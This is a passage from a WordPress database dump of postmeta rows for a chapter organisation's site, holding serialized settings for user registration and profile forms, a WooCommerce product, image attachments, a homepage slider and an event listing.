r_use_globals','1'),(1961,543,'_um_core','register'),(1960,543,'_um_mode','register'),(2112,543,'_um_profile_primary_btn_hover','#44b0ec'),(2113,543,'_um_profile_primary_btn_text','#ffffff'),(2114,543,'_um_profile_secondary_btn','1'),(2115,543,'_um_profile_secondary_btn_word','Cancel'),(2116,543,'_um_profile_secondary_btn_color','#eeeeee'),(2117,543,'_um_profile_secondary_btn_hover','#e5e5e5'),(2104,543,'_um_profile_role','0'),(2105,543,'_um_profile_template','profile'),(2106,543,'_um_profile_max_width','1000px'),(2107,543,'_um_profile_area_max_width','600px'),(2108,543,'_um_profile_align','center'),(2109,543,'_um_profile_icons','label'),(2110,543,'_um_profile_primary_btn_word','Update Profile'),(2111,543,'_um_profile_primary_btn_color','#3ba1da'),(2098,543,'_um_register_secondary_btn_word','Login'),(2099,543,'_um_register_secondary_btn_color','#eeeeee'),(2100,543,'_um_register_secondary_btn_hover','#e5e5e5'),(2101,543,'_um_register_secondary_btn_text','#666666'),(2102,543,'_um_register_custom_css',''),(2103,543,'_um_profile_use_globals','1'),(2092,543,'_um_register_icons','label'),(2093,543,'_um_register_primary_btn_word','Register'),(2094,543,'_um_register_primary_btn_color','#3ba1da'),(2095,543,'_um_register_primary_btn_hover','#44b0ec'),(2096,543,'_um_register_primary_btn_text','#ffffff'),(2097,543,'_um_register_secondary_btn','1'),(2086,543,'ts_template','a:0:{}'),(2087,543,'_edit_last','1'),(2088,543,'_um_register_role','0'),(2089,543,'_um_register_template','register'),(2090,543,'_um_register_max_width','450px'),(2091,543,'_um_register_align','center'),(1959,543,'_um_custom_fields','a:3:{s:8:\"username\";a:13:{s:5:\"title\";s:18:\"Username or E-mail\";s:7:\"metakey\";s:8:\"username\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:18:\"Username or E-mail\";s:8:\"required\";i:1;s:6:\"public\";i:1;s:8:\"editable\";i:0;s:8:\"validate\";s:24:\"unique_username_or_email\";s:8:\"position\";s:1:\"1\";s:6:\"in_row\";s:9:\"_um_row_1\";s:10:\"in_sub_row\";s:1:\"0\";s:9:\"in_column\";s:1:\"1\";s:8:\"in_group\";s:0:\"\";}s:13:\"user_password\";a:16:{s:5:\"title\";s:8:\"Password\";s:7:\"metakey\";s:13:\"user_password\";s:4:\"type\";s:8:\"password\";s:5:\"label\";s:8:\"Password\";s:8:\"required\";i:1;s:6:\"public\";i:1;s:8:\"editable\";i:1;s:9:\"min_chars\";i:8;s:9:\"max_chars\";i:30;s:15:\"force_good_pass\";i:1;s:18:\"force_confirm_pass\";i:1;s:8:\"position\";s:1:\"2\";s:6:\"in_row\";s:9:\"_um_row_1\";s:10:\"in_sub_row\";s:1:\"0\";s:9:\"in_column\";s:1:\"1\";s:8:\"in_group\";s:0:\"\";}s:9:\"_um_row_1\";a:5:{s:4:\"type\";s:3:\"row\";s:2:\"id\";s:9:\"_um_row_1\";s:8:\"sub_rows\";s:1:\"1\";s:4:\"cols\";s:1:\"1\";s:6:\"origin\";s:9:\"_um_row_1\";}}'),(1893,531,'ts_sidebar','a:3:{s:8:\"position\";s:4:\"none\";s:4:\"size\";s:3:\"1-3\";s:2:\"id\";i:0;}'),(1892,531,'_product_image_gallery',''),(1891,531,'_product_version','2.6.8'),(1890,531,'_download_type',''),(1889,531,'_download_expiry',''),(1888,531,'_download_limit',''),(1887,531,'_downloadable_files','a:0:{}'),(1860,531,'_edit_last','1'),(1861,531,'_edit_lock','1484117681:1'),(1862,531,'ts_template','a:0:{}'),(1863,531,'_visibility','visible'),(1864,531,'_stock_status','instock'),(1865,531,'total_sales','0'),(1866,531,'_downloadable','yes'),(1867,531,'_virtual','yes'),(1868,531,'_purchase_note',''),(1869,531,'_featured','no'),(1870,531,'_weight',''),(1871,531,'_length',''),(1872,531,'_width',''),(1873,531,'_height',''),(1874,531,'_sku',''),(1875,531,'_product_attributes','a:0:{}'),(1876,531,'_regular_price','40.00'),(1877,531,'_sale_price',''),(1878,531,'_sale_price_dates_from',''),(1879,531,'_sale_price_dates_to',''),(1880,531,'_price','40.00'),(1881,531,'_sold_individually',''),(1882,531,'_manage_stock','yes'),(1883,531,'_backorders','no'),(1884,531,'_stock','200.000000'),(1885,531,'_upsell_ids','a:0:{}'),(1886,531,'_crosssell_ids','a:0:{}'),(2246,579,'_wp_attached_file','2016/12/zphibtext.gif'),(2245,480,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:956;s:6:\"height\";i:445;s:4:\"file\";s:15:\"zphibtext-1.gif\";}}'),(1894,531,'ts_header_and_footer','a:3:{s:14:\"disable_header\";i:0;s:14:\"disable_footer\";i:0;s:11:\"breadcrumbs\";i:0;}'),(1895,531,'page_settings',NULL),(3434,861,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3447;s:6:\"height\";i:4173;s:4:\"file\";s:35:\"2017/01/IMG_0846-e1484268423114.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"IMG_0846-e1484268423114-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"IMG_0846-e1484268423114-248x300.jpg\";s:5:\"width\";i:248;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"IMG_0846-e1484268423114-768x930.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:930;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"IMG_0846-e1484268423114-846x1024.jpg\";s:5:\"width\";i:846;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:35:\"IMG_0846-e1484268423114-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:35:\"IMG_0846-e1484268423114-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:35:\"IMG_0846-e1484268423114-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:35:\"IMG_0846-e1484268423114-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"IMG_0846-e1484268423114-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:35:\"IMG_0846-e1484268423114-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:35:\"IMG_0846-e1484268423114-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:19:\"Canon EOS REBEL T3i\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1476644986\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"39\";s:3:\"iso\";s:4:\"1600\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"8\";s:8:\"keywords\";a:0:{}}}'),(3433,861,'_wp_attached_file','2017/01/IMG_0846-e1484268423114.jpg'),(1896,531,'post_settings',NULL),(1897,531,'_post_image_gallery',''),(1646,6,'_edit_lock','1632334301:1'),(1647,190,'_edit_lock','1507063863:1'),(1648,247,'_edit_lock','1536997678:1'),(1658,480,'_wp_attached_file','2016/11/zphibtext-1-e1480817987456.gif'),(1659,480,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:956;s:6:\"height\";i:445;s:4:\"file\";s:38:\"2016/11/zphibtext-1-e1480817987456.gif\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"zphibtext-1-150x150.gif\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/gif\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"zphibtext-1-300x140.gif\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/gif\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"zphibtext-1-768x357.gif\";s:5:\"width\";i:768;s:6:\"height\";i:357;s:9:\"mime-type\";s:9:\"image/gif\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:23:\"zphibtext-1-400x400.gif\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/gif\";}s:4:\"grid\";a:4:{s:4:\"file\";s:23:\"zphibtext-1-450x300.gif\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/gif\";}s:4:\"list\";a:4:{s:4:\"file\";s:23:\"zphibtext-1-680x300.gif\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/gif\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:23:\"zphibtext-1-180x110.gif\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/gif\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1660,480,'_edit_lock','1480818544:1'),(1662,59,'_edit_lock','1484512638:1'),(1693,493,'_edit_lock','1562251643:1'),(1694,493,'ts_template','a:0:{}'),(1695,493,'event','a:13:{s:3:\"day\";s:10:\"2018-12-01\";s:10:\"start-time\";s:7:\"7:00 AM\";s:8:\"end-time\";s:7:\"8:30 AM\";s:19:\"event-enable-repeat\";s:1:\"n\";s:9:\"event-end\";s:10:\"2018-12-01\";s:12:\"event-repeat\";s:1:\"2\";s:5:\"theme\";s:0:\"\";s:6:\"person\";s:18:\"zhope@zphiblgz.org\";s:3:\"map\";s:359:\"<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3091.122685198324!2d-76.87482528469305!3d39.217379279522525!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x89b7df757bcba0b7%3A0xd77b0106b0776d1!2sWilde+Lake+High+School!5e0!3m2!1sen!2sus!4v1505532592415\" width=\"600\" height=\"450\" frameborder=\"0\" style=\"border:0\" allowfullscreen></iframe>\";s:9:\"free-paid\";s:4:\"free\";s:10:\"ticket-url\";s:0:\"\";s:5:\"price\";s:0:\"\";s:5:\"venue\";s:35:\"Wilde Lake High School, Columbia MD\";}'),(2366,493,'_um_custom_access_settings','0'),(2367,493,'_um_accessible','0'),(2368,493,'_um_access_redirect2',''),(2369,493,'_um_access_roles','a:1:{i:0;s:1:\"0\";}'),(2370,493,'_um_access_redirect',''),(2371,600,'_wp_attached_file','2016/11/12814451_955542877814392_5354322594136598871_n.jpg'),(2372,600,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:840;s:6:\"height\";i:840;s:4:\"file\";s:58:\"2016/11/12814451_955542877814392_5354322594136598871_n.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"12814451_955542877814392_5354322594136598871_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"12814451_955542877814392_5354322594136598871_n-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"12814451_955542877814392_5354322594136598871_n-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:58:\"12814451_955542877814392_5354322594136598871_n-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:58:\"12814451_955542877814392_5354322594136598871_n-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:58:\"12814451_955542877814392_5354322594136598871_n-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:58:\"12814451_955542877814392_5354322594136598871_n-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:58:\"12814451_955542877814392_5354322594136598871_n-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:58:\"12814451_955542877814392_5354322594136598871_n-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:58:\"12814451_955542877814392_5354322594136598871_n-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1692,493,'_edit_last','1'),(1688,491,'_wp_attached_file','2016/11/APPA2-page-001.jpg'),(1689,491,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2550;s:6:\"height\";i:3300;s:4:\"file\";s:26:\"2016/11/APPA2-page-001.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"APPA2-page-001-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"APPA2-page-001-232x300.jpg\";s:5:\"width\";i:232;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"APPA2-page-001-768x994.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:994;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"APPA2-page-001-791x1024.jpg\";s:5:\"width\";i:791;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:26:\"APPA2-page-001-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:26:\"APPA2-page-001-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:26:\"APPA2-page-001-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:26:\"APPA2-page-001-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1696,493,'day','1543622400'),(1697,493,'ts_sidebar','a:3:{s:8:\"position\";s:4:\"none\";s:4:\"size\";s:3:\"1-3\";s:2:\"id\";i:0;}'),(1698,493,'ts_header_and_footer','a:3:{s:14:\"disable_header\";i:0;s:14:\"disable_footer\";i:0;s:11:\"breadcrumbs\";i:0;}'),(1699,493,'page_settings',NULL),(1700,493,'post_settings',NULL),(1701,493,'ts_article_views','1186'),(3203,783,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:17:\"2017/01/Table.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"Table-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"Table-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"Table-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"Table-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:17:\"Table-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:17:\"Table-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:17:\"Table-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:17:\"Table-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:17:\"Table-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:17:\"Table-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3202,783,'_wp_attached_file','2017/01/Table.jpg'),(3180,772,'page_settings','a:5:{s:10:\"hide_title\";s:2:\"no\";s:9:\"hide_meta\";s:2:\"no\";s:19:\"hide_social_sharing\";s:2:\"no\";s:12:\"hide_featimg\";s:2:\"no\";s:15:\"hide_author_box\";s:2:\"no\";}'),(2173,6,'_um_custom_access_settings','0'),(2174,6,'_um_accessible','0'),(2175,6,'_um_access_redirect2',''),(2176,6,'_um_access_roles','a:1:{i:0;s:1:\"0\";}'),(2177,6,'_um_access_redirect',''),(2192,570,'_wp_attached_file','2014/12/Trial.png'),(2178,568,'_wp_attached_file','2016/12/AmicetteBanner.png'),(2179,568,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:650;s:4:\"file\";s:26:\"2016/12/AmicetteBanner.png\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"AmicetteBanner-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"AmicetteBanner-300x102.png\";s:5:\"width\";i:300;s:6:\"height\";i:102;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"AmicetteBanner-768x260.png\";s:5:\"width\";i:768;s:6:\"height\";i:260;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"AmicetteBanner-1024x347.png\";s:5:\"width\";i:1024;s:6:\"height\";i:347;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:26:\"AmicetteBanner-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:26:\"AmicetteBanner-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:26:\"AmicetteBanner-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:26:\"AmicetteBanner-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"AmicetteBanner-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"AmicetteBanner-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"AmicetteBanner-600x600.png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2180,567,'ts_template','a:0:{}'),(2181,567,'_edit_last','1'),(2182,567,'slider_type','bxslider'),(2183,567,'ts_slides','a:3:{i:0;a:7:{s:8:\"slide_id\";i:0;s:11:\"slide_title\";s:4:\"LGZ \";s:17:\"slide_description\";s:0:\"\";s:9:\"slide_url\";s:75:\"https://zphiblgz.org/wp-content/uploads/2020/07/chapter-photo-smaller-1.jpg\";s:14:\"slide_media_id\";s:4:\"1388\";s:15:\"redirect_to_url\";s:0:\"\";s:14:\"slide_position\";s:4:\"left\";}i:1;a:7:{s:8:\"slide_id\";i:1;s:11:\"slide_title\";s:8:\"Reclaims\";s:17:\"slide_description\";s:0:\"\";s:9:\"slide_url\";s:62:\"https://zphiblgz.org/wp-content/uploads/2020/07/reclaims-1.jpg\";s:14:\"slide_media_id\";s:4:\"1386\";s:15:\"redirect_to_url\";s:0:\"\";s:14:\"slide_position\";s:4:\"left\";}i:2;a:7:{s:8:\"slide_id\";i:2;s:11:\"slide_title\";s:5:\"Youth\";s:17:\"slide_description\";s:0:\"\";s:9:\"slide_url\";s:60:\"https://zphiblgz.org/wp-content/uploads/2020/01/IMG_0726.jpg\";s:14:\"slide_media_id\";s:4:\"1353\";s:15:\"redirect_to_url\";s:0:\"\";s:14:\"slide_position\";s:4:\"left\";}}'),(2184,567,'_um_custom_access_settings','0'),(2185,567,'_um_accessible','0'),(2186,567,'_um_access_redirect2',''),(2187,567,'_um_access_roles','a:1:{i:0;s:1:\"0\";}'),(2188,567,'_um_access_redirect',''),(2189,567,'_edit_lock','1594139776:1'),(2193,570,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:500;s:4:\"file\";s:17:\"2014/12/Trial.png\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"Trial-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"Trial-300x78.png\";s:5:\"width\";i:300;s:6:\"height\";i:78;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"Trial-768x200.png\";s:5:\"width\";i:768;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:18:\"Trial-1024x267.png\";s:5:\"width\";i:1024;s:6:\"height\";i:267;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"Trial-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:17:\"Trial-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:17:\"Trial-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:17:\"Trial-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:17:\"Trial-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:17:\"Trial-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:17:\"Trial-600x500.png\";s:5:\"width\";i:600;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2197,571,'_wp_attached_file','2016/12/Get-Engaged-2.png'),(2198,571,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:650;s:4:\"file\";s:25:\"2016/12/Get-Engaged-2.png\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Get-Engaged-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Get-Engaged-2-300x102.png\";s:5:\"width\";i:300;s:6:\"height\";i:102;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Get-Engaged-2-768x260.png\";s:5:\"width\";i:768;s:6:\"height\";i:260;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"Get-Engaged-2-1024x347.png\";s:5:\"width\";i:1024;s:6:\"height\";i:347;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:25:\"Get-Engaged-2-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:25:\"Get-Engaged-2-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:25:\"Get-Engaged-2-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"im